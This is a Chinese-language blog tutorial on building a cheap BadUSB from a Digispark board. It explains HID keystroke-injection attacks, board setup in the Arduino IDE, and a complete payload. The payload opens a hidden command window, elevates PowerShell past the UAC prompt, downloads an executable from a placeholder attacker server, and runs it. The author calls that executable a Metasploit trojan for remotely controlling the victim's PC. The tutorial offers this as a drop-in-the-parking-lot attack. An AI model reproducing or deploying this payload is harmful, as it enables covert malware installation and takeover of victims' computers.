【Badusb】6元钱制作Badusb教程
【Badusb】6元钱制作Badusb教程
在公司前一段时间了解了一些社工类产品,其中的U盘引起了我的注意,于是在网上查阅了许多资料完成制作。以下为关于Badusb的知识和制作教程:
1、概述
在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。
2、Badusb内部结构
在这张图中便可以了解到Badusb和普通的U盘并没有什么两样,因此迷惑性极高,很容易攻击成功。
3、Badusb Hid攻击原理
HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,今天要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。
4、常见的Badusb开发板
(1)Teensy
(2)Arduino Leonardo
(3)Digispark
综上,基本Teensy和Arduino Leonardo价格在50-200rmb之间,那么作为一个使用方法大多为撒在地上、一次性的黑客工具来说,成本是一个很大的问题,那么今天就来介绍一款只需要几块钱就能买到的BadUSB——Digispark,淘宝搜索Digispark即可。
5、环境配置
安装 Arduino 的 IDE:https://www.arduino.cc/en/Main/Software
根据自己的操作系统下载并安装。
打开Arduino应用程序,点击“文件”菜单并选择“首选项”
在附加开发板管理器网址内填入并点击确定
http://digistump.com/package_digistump_index.json
进入“工具”菜单,然后选择“开发板”子菜单 - 选择“开发板管理器”。
然后在搜索框中搜索“Digistump AVR Boards”,然后点击安装(这里安装速度较慢,建议使用*)。
(我这已经安装过了)
安装完成后,就可以在开发板中看到Digispark了。选择默认的Digispark (Default - 16.5mhz)。
环境配置完成之后就可以写入payload了。
6、Payload
#include "DigiKeyboard.h"
void setup() {
// put your setup code here, to run once:
DigiKeyboard.delay(1000);//延时1秒
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//按下win+r键
DigiKeyboard.delay(500);
DigiKeyboard.println("cmd");//输入"cmd"并确认
DigiKeyboard.delay(500);
DigiKeyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");//缩小cmd窗口
DigiKeyboard.delay(300);
DigiKeyboard.println("powershell.exe -command start-process powershell -verb runAs");//以管理员身份运行powershell
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);//按下左箭头
DigiKeyboard.sendKeyStroke(KEY_ENTER);//按下回车
DigiKeyboard.delay(1000);
DigiKeyboard.println("$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT");
DigiKeyboard.println("$P.dOWNLOADfILE('HTTP://XXX/Shell.exe','D:\\ceshi.exe')");//从服务器上下载木马到D盘
DigiKeyboard.delay(500);
DigiKeyboard.println("D:\\ceshi.exe");//启动木马
DigiKeyboard.delay(500);
DigiKeyboard.println("exit");//退出
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);//按下ALT+F4
}
void loop() {
// put your main code here, to run repeatedly:
}
之后就可以插入Digispark板点击箭头上传代码了。
总结
上述为利用kali中的msf生成的木马,从远端服务器下载并执行控制电脑的代码,将上述的XXX该为自己的服务器IP即可,具体服务器搭建和msf木马生成因时间原因就先不写了,本人也是一个小白,教程也是参考了他人,文中也可能出现错误,希望大家多多指正,不要喷。
参考文章:https://www.jianshu.com/p/77925ffae904
参考文章:https://www.77169.net/html/245762.html